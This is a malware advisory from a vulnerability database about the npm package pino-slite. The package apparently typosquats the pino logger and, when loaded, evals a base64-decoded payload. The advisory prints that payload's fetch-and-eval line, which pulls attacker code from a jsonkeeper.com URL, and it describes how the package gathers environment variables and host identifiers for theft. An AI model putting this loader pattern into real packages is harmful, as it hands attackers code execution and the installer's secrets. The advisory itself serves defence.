VDB

MAL-2026-6078

Malicious code in pino-slite (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb)

pino-slite impersonates the legitimate `pino` logger (README titled 'pino-slite (Pino)' with badges and homepage pointing to getpino.io, exported function named `pino`). On require(), lib/writer.js (loaded transitively from the package main pino.js) decodes a base64 string and passes it to eval(atob(hash)). The decoded payload performs `fetch('https://jsonkeeper.com/b/0DWFC').then(r=>r.json()).then(d=>{eval(d.ret);})`, executing attacker-controlled JavaScript fetched from a mutable third-party paste host on every load. Immediately before the eval, the module assembles a `data` object containing `{...process.env, version, platform: os.platform(), hostname: os.hostname(), username: os.userInfo().username, macAddresses: <non-internal IPv4 MACs>}`, which is in scope for the remotely-fetched code — providing a ready-made channel to exfiltrate the installer's full environment (CI secrets, AWS_*, NPM_TOKEN, GH tokens, etc.) and host identifiers. This combines a typosquat lure, an import-time RCE dropper from an attacker-controlled mutable URL, and an environment-credential harvester.


Affected packages

npm / pino-slite

No fixed version published yet for pino-slite (npm). Pin to a known-safe version or switch to an alternative.
